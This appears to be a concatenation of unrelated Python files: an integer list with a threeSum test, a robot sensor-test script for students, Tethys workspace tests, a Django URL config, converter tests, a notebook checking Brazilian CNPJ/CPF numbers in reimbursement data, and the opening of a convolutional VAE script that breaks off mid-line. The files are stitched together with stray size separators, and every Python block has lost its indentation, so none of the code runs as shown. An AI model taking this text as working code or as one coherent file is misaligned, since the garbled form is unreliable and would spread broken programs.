-14531,
-86870,
-9274,
-26173,
98640,
88652,
64257,
46457,
37814,
-19370,
9337,
-22556,
-41525,
39105,
-28719,
51611,
-93252,
98044,
-90996,
21710,
-47605,
-64259,
-32727,
53611,
-31918,
-3555,
33316,
-66472,
21274,
-37731,
-2919,
15016,
48779,
-88868,
1897,
41728,
46344,
-89667,
37848,
68092,
-44011,
85354,
-43776,
38739,
-31423,
-66330,
65167,
-22016,
59405,
34328,
-60042,
87660,
-67698,
-59174,
-1408,
-46809,
-43485,
-88807,
-60489,
13974,
22319,
55836,
-62995,
-37375,
-4185,
32687,
-36551,
-75237,
58280,
26942,
-73756,
71756,
78775,
-40573,
14367,
-71622,
-77338,
24112,
23414,
-7679,
-51721,
87492,
85066,
-21612,
57045,
10673,
-96836,
52461,
-62218,
-9310,
65862,
-22748,
89906,
-96987,
-98698,
26956,
-43428,
46141,
47456,
28095,
55952,
67323,
-36455,
-60202,
-43302,
-82932,
42020,
77036,
10142,
60406,
70331,
63836,
58850,
-66752,
52109,
21395,
-10238,
-98647,
-41962,
27778,
69060,
98535,
-28680,
-52263,
-56679,
66103,
-42426,
27203,
80021,
10153,
58678,
36398,
63112,
34911,
20515,
62082,
-15659,
-40785,
27054,
43767,
-20289,
65838,
-6954,
-60228,
-72226,
52236,
-35464,
25209,
-15462,
-79617,
-41668,
-84083,
62404,
-69062,
18913,
46545,
20757,
13805,
24717,
-18461,
-47009,
-25779,
68834,
64824,
34473,
39576,
31570,
14861,
-15114,
-41233,
95509,
68232,
67846,
84902,
-83060,
17642,
-18422,
73688,
77671,
-26930,
64484,
-99637,
73875,
6428,
21034,
-73471,
19664,
-68031,
15922,
-27028,
48137,
54955,
-82793,
-41144,
-10218,
-24921,
-28299,
-2288,
68518,
-54452,
15686,
-41814,
66165,
-72207,
-61986,
80020,
50544,
-99500,
16244,
78998,
40989,
14525,
-56061,
-24692,
-94790,
21111,
37296,
-90794,
72100,
70550,
-31757,
17708,
-74290,
61910,
78039,
-78629,
-25033,
73172,
-91953,
10052,
64502,
99585,
-1741,
90324,
-73723,
68942,
28149,
30218,
24422,
16659,
10710,
-62594,
94249,
96588,
46192,
34251,
73500,
-65995,
-81168,
41412,
-98724,
-63710,
-54696,
-52407,
19746,
45869,
27821,
-94866,
-76705,
-13417,
-61995,
-71560,
43450,
67384,
-8838,
-80293,
-28937,
23330,
-89694,
-40586,
46918,
80429,
-5475,
78013,
25309,
-34162,
37236,
-77577,
86744,
26281,
-29033,
-91813,
35347,
13033,
-13631,
-24459,
3325,
-71078,
-75359,
81311,
19700,
47678,
-74680,
-84113,
45192,
35502,
37675,
19553,
76522,
-51098,
-18211,
89717,
4508,
-82946,
27749,
85995,
89912,
-53678,
-64727,
-14778,
32075,
-63412,
-40524,
86440,
-2707,
-36821,
63850,
-30883,
67294,
-99468,
-23708,
34932,
34386,
98899,
29239,
-23385,
5897,
54882,
98660,
49098,
70275,
17718,
88533,
52161,
63340,
50061,
-89457,
19491,
-99156,
24873,
-17008,
64610,
-55543,
50495,
17056,
-10400,
-56678,
-29073,
-42960,
-76418,
98562,
-88104,
-96255,
10159,
-90724,
54011,
12052,
45871,
-90933,
-69420,
67039,
37202,
78051,
-52197,
-40278,
-58425,
65414,
-23394,
-1415,
6912,
-53447,
7352,
17307,
-78147,
63727,
98905,
55412,
-57658,
-32884,
-44878,
22755,
39730,
3638,
35111,
39777,
74193,
38736,
-11829,
-61188,
-92757,
55946,
-71232,
-63032,
-83947,
39147,
-96684,
-99233,
25131,
-32197,
24406,
-55428,
-61941,
25874,
-69453,
64483,
-19644,
-68441,
12783,
87338,
-48676,
66451,
-447,
-61590,
50932,
-11270,
29035,
65698,
-63544,
10029,
80499,
-9461,
86368,
91365,
-81810,
-71914,
-52056,
-13782,
44240,
-30093,
-2437,
24007,
67581,
-17365,
-69164,
-8420,
-69289,
-29370,
48010,
90439,
13141,
69243,
50668,
39328,
61731,
78266,
-81313,
17921,
-38196,
55261,
9948,
-24970,
75712,
-72106,
28696,
7461,
31621,
61047,
51476,
56512,
11839,
-96916,
-82739,
28924,
-99927,
58449,
37280,
69357,
11219,
-32119,
-62050,
-48745,
-83486,
-52376,
42668,
82659,
68882,
38773,
46269,
-96005,
97630,
25009,
-2951,
-67811,
99801,
81587,
-79793,
-18547,
-83086,
69512,
33127,
-92145,
-88497,
47703,
59527,
1909,
88785,
-88882,
69188,
-46131,
-5589,
-15086,
36255,
-53238,
-33009,
82664,
53901,
35939,
-42946,
-25571,
33298,
69291,
53199,
74746,
-40127,
-39050,
91033,
51717,
-98048,
87240,
36172,
65453,
-94425,
-63694,
-30027,
59004,
88660,
3649,
-20267,
-52565,
-67321,
34037,
4320,
91515,
-56753,
60115,
27134,
68617,
-61395,
-26503,
-98929,
-8849,
-63318,
10709,
-16151,
61905,
-95785,
5262,
23670,
-25277,
90206,
-19391,
45735,
37208,
-31992,
-92450,
18516,
-90452,
-58870,
-58602,
93383,
14333,
17994,
82411,
-54126,
-32576,
35440,
-60526,
-78764,
-25069,
-9022,
-394,
92186,
-38057,
55328,
-61569,
67780,
77169,
19546,
-92664,
-94948,
44484,
-13439,
83529,
27518,
-48333,
72998,
38342,
-90553,
-98578,
-76906,
81515,
-16464,
78439,
92529,
35225,
-39968,
-10130,
-7845,
-32245,
-74955,
-74996,
67731,
-13897,
-82493,
33407,
93619,
59560,
-24404,
-57553,
19486,
-45341,
34098,
-24978,
-33612,
79058,
71847,
76713,
-95422,
6421,
-96075,
-59130,
-28976,
-16922,
-62203,
69970,
68331,
21874,
40551,
89650,
51908,
58181,
66480,
-68177,
34323,
-3046,
-49656,
-59758,
43564,
-10960,
-30796,
15473,
-20216,
46085,
-85355,
41515,
-30669,
-87498,
57711,
56067,
63199,
-83805,
62042,
91213,
-14606,
4394,
-562,
74913,
10406,
96810,
-61595,
32564,
31640,
-9732,
42058,
98052,
-7908,
-72330,
1558,
-80301,
34878,
32900,
3939,
-8824,
88316,
20937,
21566,
-3218,
-66080,
-31620,
86859,
54289,
90476,
-42889,
-15016,
-18838,
75456,
30159,
-67101,
42328,
-92703,
85850,
-5475,
23470,
-80806,
68206,
17764,
88235,
46421,
-41578,
74005,
-81142,
80545,
20868,
-1560,
64017,
83784,
68863,
-97516,
-13016,
-72223,
79630,
-55692,
82255,
88467,
28007,
-34686,
-69049,
-41677,
88535,
-8217,
68060,
-51280,
28971,
49088,
49235,
26905,
-81117,
-44888,
40623,
74337,
-24662,
97476,
79542,
-72082,
-35093,
98175,
-61761,
-68169,
59697,
-62542,
-72965,
59883,
-64026,
-37656,
-92392,
-12113,
-73495,
98258,
68379,
-21545,
64607,
-70957,
-92254,
-97460,
-63436,
-8853,
-19357,
-51965,
-76582,
12687,
-49712,
45413,
-60043,
33496,
31539,
-57347,
41837,
67280,
-68813,
52088,
-13155,
-86430,
-15239,
-45030,
96041,
18749,
-23992,
46048,
35243,
-79450,
85425,
-58524,
88781,
-39454,
53073,
-48864,
-82289,
39086,
82540,
-11555,
25014,
-5431,
-39585,
-89526,
2705,
31953,
-81611,
36985,
-56022,
68684,
-27101,
11422,
64655,
-26965,
-63081,
-13840,
-91003,
-78147,
-8966,
41488,
1988,
99021,
-61575,
-47060,
65260,
-23844,
-21781,
-91865,
-19607,
44808,
2890,
63692,
-88663,
-58272,
15970,
-65195,
-45416,
-48444,
-78226,
-65332,
-24568,
42833,
-1806,
-71595,
80002,
-52250,
30952,
48452,
-90106,
31015,
-22073,
62339,
63318,
78391,
28699,
77900,
-4026,
-76870,
-45943,
33665,
9174,
-84360,
-22684,
-16832,
-67949,
-38077,
-38987,
-32847,
51443,
-53580,
-13505,
9344,
-92337,
26585,
70458,
-52764,
-67471,
-68411,
-1119,
-2072,
-93476,
67981,
40887,
-89304,
-12235,
41488,
1454,
5355,
-34855,
-72080,
24514,
-58305,
3340,
34331,
8731,
77451,
-64983,
-57876,
82874,
62481,
-32754,
-39902,
22451,
-79095,
-23904,
78409,
-7418,
77916
]
# print(threeSum(list))
# print(find_index_of_first_positive(sorted(list)))=
class TestThreeSum(TestCase):
def test_sum(self):
self.assertEqual(threeSum([-1, 0, 1, 2, -1, -4]), [[-1, -1, 2]])
self.assertEqual(threeSum([0, 0, 0, 0]), [])
self.assertEqual(threeSum([0, 0]), [])
self.assertEqual(threeSum([-2, 0, 1, 1, 2]), [[-2, 0, 2], [-2, 1, 1]])
self.assertEqual(threeSum([-1, 0, 1, 0]), [[-1, 0, 1]])
| 36,390 | 26,061 |
"""
Capstone Team Project. Code to run on a ROBOT (NOT a laptop).
This module is for testing STAND-ALONE code running on the ROBOT
(WITHOUT having LAPTOP GUI code running on the LAPTOP at the same time).
In tests the various SENSORS available to you.
Authors: Your professors (for the framework).
Winter term, 2019-2020.
"""
###############################################################################
# STUDENTS: This module is ALREADY IMPLEMENTED.
# RUN it to test the sensors.
# You may MODIFY or AUGMENT this module as you choose.
###############################################################################
import libs.rosebot as rb
import time
def main():
""" Tests the various Sensors of a Snatch3r robot. """
print()
print("--------------------------------------------------")
print("Testing the various Sensors of a robot")
print("--------------------------------------------------")
# Change the following if you want the readings to appear
# more slowly (try 1.0) or more quickly (try 0.1).
# The default is half a second between readings.
seconds_between_readings = 0.5 # Default: 0.5 second between each reading.
print()
print("This program displays readings from most")
print("of the sensors on your Snatch3r robot.")
print("It also makes sounds.")
print(" 1. If you want to SKIP readings from a")
print(" particular sensor, or sounds, either:")
print(" -- comment-out its call in MAIN, or")
print(" -- press Control-C when that sensor starts.")
print(" 2. The readings are displayed at a rate of")
print(" {:5.2} seconds per reading, by default.".format(
seconds_between_readings))
print(" Change the number in MAIN (or in the function")
print(" function calls in MAIN), if you want them")
print(" more quickly or slowly.")
# Comment-out the tests/readings you want to skip.
make_sounds()
print_touch_sensor_readings(seconds_between_readings)
print_color_sensor_readings(seconds_between_readings)
print_infrared_proximity_readings(seconds_between_readings)
print_beacon_sensor_readings(seconds_between_readings)
print_remote_control_readings(seconds_between_readings)
print_camera_readings(seconds_between_readings)
def make_sounds():
try:
robot = rb.RoseBot()
print()
print("--------------------------------------------------")
print("Demonstrating how to make sounds.")
print("--------------------------------------------------")
print()
print("Remember: Leave time between any sound-making,")
print("else sounds may be clipped. If sounds are")
print("clipped, you may have to reboot the robot.")
print()
print("Beep 5 times.")
for k in range(5):
robot.sound.beep()
time.sleep(0.2)
print()
print("Play a fun song.")
robot.sound.play_vader_song()
print()
print("Play 5 tones.")
for tone in range(100, 350, 50):
duration = 50 # milliseconds
robot.sound.play_tone(tone, duration)
print()
print("Play a 6-tone sequence.")
robot.sound.play_tone_sequence([(100, 200, 10),
(150, 50, 50),
(200, 100, 10),
(250, 1000, 20),
(300, 50, 5),
(350, 50, 10)])
print()
print("Play a WAV file.")
robot.sound.play_lego_wav_file()
print()
print("Speak. Speaking may not work if you make")
print("other sounds before speaking.")
print("After speaking, other sounds may fail.")
print("Leave plenty of time for the speech")
print("to happen, and use SHORT phrases.")
robot.sound.speak("Greetings, Earthlings.")
time.sleep(3)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_touch_sensor_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Touch Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the physical Touch Sensor that is underneath")
print("the physical motor at the top of the Arm and Claw.")
print()
print("While this test is running, try pressing and releasing")
print("that physical Touch Sensor to see its readings.")
print("")
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
print("Pressed (True or False)? Value (0 or 1)?: {:5} {}".format(
str(robot.touch_sensor.is_pressed()),
robot.touch_sensor.get_reading()))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_color_sensor_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Color Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the downward-facing physical Color Sensor.")
print()
print("While this test is running, try moving the robot around,")
print("placing the physical Color Sensor on different colors.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
print("As name, number, reflectance: {:8} {:1} {:3}".format(
robot.color_sensor.get_color_as_name(),
robot.color_sensor.get_color_as_number(),
robot.color_sensor.get_reflected_light_intensity()))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_infrared_proximity_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Infrared Proximity Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the forward-facing physical Infrared Proximity")
print("Sensor (the thing on the front of the claw).")
print()
print("While this test is running, try putting your hand")
print("different distances from that physical Infrared sensor.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
print("Distance in inches: {:5.2f}".format(
robot.infrared_proximity_sensor.get_distance_in_inches()))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_beacon_sensor_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Beacon Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the Beacon (the stand-alone remote-control thing).")
print()
print("While this test is running, try turning the Beacon")
print("on, then moving it to various places in front")
print("of the robot, as well as places out of the Infrared")
print("Sensors field of vision. Then try turning the Beacon off.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
message = "Distance (inches), heading (sort of degrees): {:3} {:3}"
print(message.format(robot.beacon_sensor.get_distance(),
robot.beacon_sensor.get_heading()))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_remote_control_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Remote Control Sensor of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the Remote Control (the stand-alone thing).")
print()
print("While this test is running, try pressing the")
print("Remote Control's four buttons (one at a time)")
print("while pointing the Remote Control toward the front")
print("of the robot (and elsewhere too).")
print()
print("Also try the red switch as its four settings.")
print("When no button is pressed, nothing will be printed.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
for red_switch in [1, 2, 3, 4]:
for button in ["red_up", "red_down", "blue_up", "blue_down"]:
if robot.remote_control.is_pressed(red_switch, button):
msg = "Button {} with red switch at {} is pressed."
print(msg.format(button, red_switch))
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
def print_camera_readings(seconds_between_readings):
robot = rb.RoseBot() # Fresh RoseBot so that sensors do not conflict.
print()
print("--------------------------------------------------")
print("Testing the Camera of a robot")
print("--------------------------------------------------")
print()
print("This function displays readings,")
print("once per {:5.2f} second,".format(seconds_between_readings))
print("from the Camera.")
print()
print("Before running this test, train your Camera")
print("on a colored object to get a good color model.")
print("Also, make sure the Camera is NOT")
print("in Arduino mode.")
print()
print("While this test is running, try putting the object")
print("that you used for training in front of the physical")
print("camera, then slowly moving it to various places")
print("to the left/right and up/down, as well as")
print("places out of the Camera's field of vision.")
print()
print("Stop this test by pressing Control-C when desired.")
input("Press the ENTER key when ready to start getting readings.")
try:
while True:
blob = robot.camera.get_biggest_blob()
print(blob)
time.sleep(seconds_between_readings)
except KeyboardInterrupt:
print()
print("OK, you just did a keyboard interrupt (Control-C).")
print("No worries. The program will keep running from here.")
| 12,750 | 3,543 |
import unittest
import tethys_apps.base.workspace as base_workspace
import os
import shutil
from unittest import mock
from ... import UserFactory
from django.http import HttpRequest
from django.contrib.auth.models import User
from django.core.exceptions import PermissionDenied
import tethys_apps.base.app_base as tethys_app_base
from tethys_apps.base.workspace import user_workspace, app_workspace, _get_app_workspace, _get_user_workspace
from tethys_quotas.models import ResourceQuota
@user_workspace
def user_dec_controller(request, user_workspace):
return user_workspace
@app_workspace
def app_dec_controller(request, app_workspace):
return app_workspace
class TestUrlMap(unittest.TestCase):
def setUp(self):
self.root = os.path.abspath(os.path.dirname(__file__))
self.test_root = os.path.join(self.root, 'test_workspace')
self.test_root_a = os.path.join(self.test_root, 'test_workspace_a')
self.test_root2 = os.path.join(self.root, 'test_workspace2')
self.app = tethys_app_base.TethysAppBase()
self.user = UserFactory()
def tearDown(self):
if os.path.isdir(self.test_root):
shutil.rmtree(self.test_root)
if os.path.isdir(self.test_root2):
shutil.rmtree(self.test_root2)
def test_TethysWorkspace(self):
# Test Create new workspace folder test_workspace
result = base_workspace.TethysWorkspace(path=self.test_root)
workspace = '<TethysWorkspace path="{0}">'.format(self.test_root)
# Create new folder inside test_workspace
base_workspace.TethysWorkspace(path=self.test_root_a)
# Create new folder test_workspace2
base_workspace.TethysWorkspace(path=self.test_root2)
self.assertEqual(result.__repr__(), workspace)
self.assertEqual(result.path, self.test_root)
# Create Files
file_list = ['test1.txt', 'test2.txt']
for file_name in file_list:
# Create file
open(os.path.join(self.test_root, file_name), 'a').close()
# Test files with full path
result = base_workspace.TethysWorkspace(path=self.test_root).files(full_path=True)
for file_name in file_list:
self.assertIn(os.path.join(self.test_root, file_name), result)
# Test files without full path
result = base_workspace.TethysWorkspace(path=self.test_root).files()
for file_name in file_list:
self.assertIn(file_name, result)
# Test Directories with full path
result = base_workspace.TethysWorkspace(path=self.root).directories(full_path=True)
self.assertIn(self.test_root, result)
self.assertIn(self.test_root2, result)
# Test Directories without full path
result = base_workspace.TethysWorkspace(path=self.root).directories()
self.assertIn('test_workspace', result)
self.assertIn('test_workspace2', result)
self.assertNotIn(self.test_root, result)
self.assertNotIn(self.test_root2, result)
# Write to file
f = open(os.path.join(self.test_root, 'test2.txt'), 'w')
f.write('Hello World')
f.close()
# Test size greater than zero
workspace_size = base_workspace.TethysWorkspace(path=self.test_root).get_size()
self.assertTrue(workspace_size > 0)
# Test get size unit conversion
workspace_size_kb = base_workspace.TethysWorkspace(path=self.test_root).get_size('kb')
self.assertEquals(workspace_size/1024, workspace_size_kb)
# Test Remove file
base_workspace.TethysWorkspace(path=self.test_root).remove('test2.txt')
# Verify that the file has been remove
self.assertFalse(os.path.isfile(os.path.join(self.test_root, 'test2.txt')))
# Test Remove Directory
base_workspace.TethysWorkspace(path=self.root).remove(self.test_root2)
# Verify that the Directory has been remove
self.assertFalse(os.path.isdir(self.test_root2))
# Test Clear
base_workspace.TethysWorkspace(path=self.test_root).clear()
# Test size equal to zero
workspace_size = base_workspace.TethysWorkspace(path=self.test_root).get_size()
self.assertTrue(workspace_size == 0)
# Verify that the Directory has been remove
self.assertFalse(os.path.isdir(self.test_root_a))
# Verify that the File has been remove
self.assertFalse(os.path.isfile(os.path.join(self.test_root, 'test1.txt')))
# Test don't allow overwriting the path property
workspace = base_workspace.TethysWorkspace(path=self.test_root)
workspace.path = 'foo'
self.assertEqual(self.test_root, workspace.path)
@mock.patch('tethys_apps.base.workspace.TethysWorkspace')
def test_get_user_workspace(self, mock_tws):
user = self.user
_get_user_workspace(self.app, user)
# Check result
rts_call_args = mock_tws.call_args_list
self.assertIn('workspaces', rts_call_args[0][0][0])
self.assertIn('user_workspaces', rts_call_args[0][0][0])
self.assertIn(user.username, rts_call_args[0][0][0])
@mock.patch('tethys_apps.base.workspace.TethysWorkspace')
def test_get_user_workspace_http(self, mock_tws):
from django.http import HttpRequest
request = HttpRequest()
request.user = self.user
_get_user_workspace(self.app, request)
# Check result
rts_call_args = mock_tws.call_args_list
self.assertIn('workspaces', rts_call_args[0][0][0])
self.assertIn('user_workspaces', rts_call_args[0][0][0])
self.assertIn(self.user.username, rts_call_args[0][0][0])
@mock.patch('tethys_apps.base.workspace.TethysWorkspace')
def test_get_user_workspace_none(self, mock_tws):
_get_user_workspace(self.app, None)
# Check result
rts_call_args = mock_tws.call_args_list
self.assertIn('workspaces', rts_call_args[0][0][0])
self.assertIn('user_workspaces', rts_call_args[0][0][0])
self.assertIn('anonymous_user', rts_call_args[0][0][0])
def test_get_user_workspace_error(self):
with self.assertRaises(ValueError) as context:
_get_user_workspace(self.app, 'test')
self.assertEquals(
"Invalid type for argument 'user': must be either an User or HttpRequest object.", str(context.exception))
@mock.patch('tethys_apps.base.workspace.TethysWorkspace')
def test_get_app_workspace(self, mock_tws):
_get_app_workspace(self.app)
# Check result
rts_call_args = mock_tws.call_args_list
self.assertIn('workspaces', rts_call_args[0][0][0])
self.assertIn('app_workspace', rts_call_args[0][0][0])
self.assertNotIn('user_workspaces', rts_call_args[0][0][0])
@mock.patch('tethys_apps.base.workspace.log')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_user_workspace')
def test_user_workspace_user(self, mock_guw, _, mock_rq, mock_log):
user_workspace = mock.MagicMock()
mock_guw.return_value = user_workspace
mock_rq.objects.get.return_value = mock.MagicMock(codename='user_workspace_quota')
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
ret = user_dec_controller(mock_request)
self.assertEqual(user_workspace, ret)
self.assertEqual(0, len(mock_log.warning.call_args_list))
@mock.patch('tethys_apps.base.workspace.log')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_user_workspace')
def test_user_workspace_rq_does_not_exist(self, _, __, mock_rq, mock_log):
mock_rq.objects.get.side_effect = ResourceQuota.DoesNotExist
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
user_dec_controller(mock_request)
mock_log.warning.assert_called_with('ResourceQuota with codename user_workspace_quota does not exist.')
def test_user_workspace_no_HttpRequest(self):
mock_request = mock.MagicMock()
ret = None
with self.assertRaises(ValueError) as context:
ret = user_dec_controller(mock_request)
self.assertTrue(
'No request given. The user_workspace decorator only works on controllers.' in str(context.exception))
self.assertEqual(None, ret)
@mock.patch('tethys_apps.base.workspace.passes_quota')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_user_workspace')
def test_user_workspace_passes_quota_false(self, _, mock_app, mock_rq, mock_pq):
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_rq.objects.get.return_value = mock.MagicMock(help='helpful message')
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
mock_pq.return_value = False
ret = None
with self.assertRaises(PermissionDenied) as context:
ret = user_dec_controller(mock_request)
self.assertTrue("helpful message" in str(context.exception))
self.assertEqual(None, ret)
@mock.patch('tethys_apps.base.workspace.log')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_app_workspace')
def test_app_workspace_app(self, mock_gaw, _, mock_rq, mock_log):
app_workspace = mock.MagicMock()
mock_gaw.return_value = app_workspace
mock_rq.objects.get.return_value = mock.MagicMock(codename='app_workspace_quota')
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
ret = app_dec_controller(mock_request)
self.assertEqual(app_workspace, ret)
self.assertEqual(0, len(mock_log.warning.call_args_list))
@mock.patch('tethys_quotas.utilities.log')
@mock.patch('tethys_apps.base.workspace.log')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_app_workspace')
def test_app_workspace_rq_does_not_exist(self, _, __, mock_rq, mock_log, ___):
mock_rq.objects.get.side_effect = ResourceQuota.DoesNotExist
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
app_dec_controller(mock_request)
mock_log.warning.assert_called_with('ResourceQuota with codename app_workspace_quota does not exist.')
def test_app_workspace_no_HttpRequest(self):
mock_request = mock.MagicMock()
ret = None
with self.assertRaises(ValueError) as context:
ret = app_dec_controller(mock_request)
self.assertTrue(
'No request given. The app_workspace decorator only works on controllers.' in str(context.exception))
self.assertEqual(None, ret)
@mock.patch('tethys_apps.base.workspace.passes_quota')
@mock.patch('tethys_quotas.models.ResourceQuota')
@mock.patch('tethys_apps.utilities.get_active_app')
@mock.patch('tethys_apps.base.workspace._get_app_workspace')
def test_app_workspace_passes_quota_false(self, _, mock_app, mock_rq, mock_pq):
mock_rq.DoesNotExist = ResourceQuota.DoesNotExist
mock_rq.objects.get.return_value = mock.MagicMock(help='helpful message')
mock_request = mock.MagicMock(spec=HttpRequest, user=mock.MagicMock(spec=User))
mock_pq.return_value = False
ret = None
with self.assertRaises(PermissionDenied) as context:
ret = app_dec_controller(mock_request)
self.assertTrue("helpful message" in str(context.exception))
self.assertEqual(None, ret)
| 12,233 | 4,098 |
from django.urls import path
from django.views.decorators.csrf import csrf_exempt
from .views import UserView, RegisterUser, LoginUser, LogoutUser, \
CheckAuthenticated
urlpatterns = [
path('', UserView.as_view()),
path('register', csrf_exempt(RegisterUser.as_view())),
path('login', LoginUser.as_view()),
path('logout', LogoutUser.as_view()),
path('isAuthenticated', CheckAuthenticated.as_view())
]
| 425 | 137 |
# -*- coding: utf-8 -*-
from pip_benchmark_python.utilities.Converter import Converter
class TestConverter:
def test_long_to_string(self):
assert Converter.long_to_string(None) is None
assert '123' == Converter.long_to_string(123)
def test_string_to_long(self):
assert 0 == Converter.string_to_long(None, 0)
assert 0 == Converter.string_to_long('ABC', 0)
assert 123 == Converter.string_to_long('123', 0)
def test_double_to_string(self):
assert Converter.double_to_string(None) is None
assert '123.456' == Converter.double_to_string(123.456)
def test_string_to_double(self):
assert 0 == Converter.string_to_double(None, 0)
assert 0 == Converter.string_to_double('ABC', 0)
assert 123.456 == Converter.string_to_double('123.456', 0)
def test_boolean_to_string(self):
assert 'false' == Converter.boolean_to_string(None)
assert 'true' == Converter.boolean_to_string(True)
def test_string_to_boolean(self):
assert False is Converter.string_to_boolean(None, False)
assert True is Converter.string_to_boolean('True', False)
assert True is Converter.string_to_boolean('1', False)
assert True is Converter.string_to_boolean('T', False)
| 1,287 | 450 |
# coding: utf-8
# # Invalid CNPJ or CPF
#
# `cnpj_cpf` is the column identifying the company or individual who received the payment made by the congressperson. Having this value empty should mean that it's an expense made outside Brazil, with a company (or person) without a Brazilian ID.
# In[1]:
import numpy as np
import pandas as pd
dataset = pd.read_csv('../data/2016-11-19-reimbursements.xz',
dtype={'applicant_id': np.str,
'cnpj_cpf': np.str,
'congressperson_id': np.str,
'subquota_number': np.str},
low_memory=False)
dataset.shape
# In[2]:
from pycpfcnpj import cpfcnpj
def validate_cnpj_cpf(cnpj_or_cpf):
return (cnpj_or_cpf == None) | cpfcnpj.validate(cnpj_or_cpf)
cnpj_cpf_list = dataset['cnpj_cpf'].astype(np.str).replace('nan', None)
dataset['valid_cnpj_cpf'] = np.vectorize(validate_cnpj_cpf)(cnpj_cpf_list)
# `document_type` 2 means expenses made abroad.
# In[3]:
keys = ['year',
'applicant_id',
'document_id',
'total_net_value',
'cnpj_cpf',
'supplier',
'document_type']
dataset.query('document_type != 2').loc[~dataset['valid_cnpj_cpf'], keys]
# With 1,532,491 records in the dataset and just 10 with invalid CNPJ/CPF, we can probably assume that the Chamber of Deputies has a validation in the tool where the congressperson requests for reimbursements. These represent a mistake in the implemented algorithm.
# In[ ]:
| 1,541 | 540 |
#!/usr/bin/env python
"""
Convolutional variational auto-encoder for MNIST data. The model is
written in TensorFlow, with neural networks using Pretty Tensor.
Probability model
Prior: Normal
Likelihood: Bernoulli parameterized by convolutional NN
Variational model
Likelihood: Mean-field Normal parameterized by convolutional NN
"""
from __future__ import print_function
import os
import edward as ed
import prettytensor as pt
import tensorflow as tf
from convolutional_vae_util import deconv2d
from edward import Variational, Normal
from progressbar import ETA, Bar, Percentage, ProgressBar
from scipy.misc import imsave
from tensorflow.examples.tutorials.mnist import input_data
flags = tf.flags
logging = tf.logging
flags.DEFINE_integer("num_vars", 10, "Number of latent variables.")
flags.DEFINE_integer("n_iter_per_epoch", 1000, "Number of iterations per epoch.")
flags.DEFINE_integer("n_epoch", 100, "Maximum number of epochs.")
flags.DEFINE_integer("n_data", 128, "Mini-batch size for data subsampling.")
flags.DEFINE_string("data_directory", "data/mnist", "Directory to store data.")
flags.DEFINE_string("img_directory", "img", "Directory to store sampled images.")
FLAGS = flags.FLAGS
def mapping(self, x):
"""
lambda = phi(x)
"""
with pt.defaults_scope(activation_fn=tf.nn.elu,
batch_normalize=True,
learned_moments_update_rate=0.0003,
variance_epsilon=0.001,
scale_after_normalization=True):
params = (pt.wrap(x).
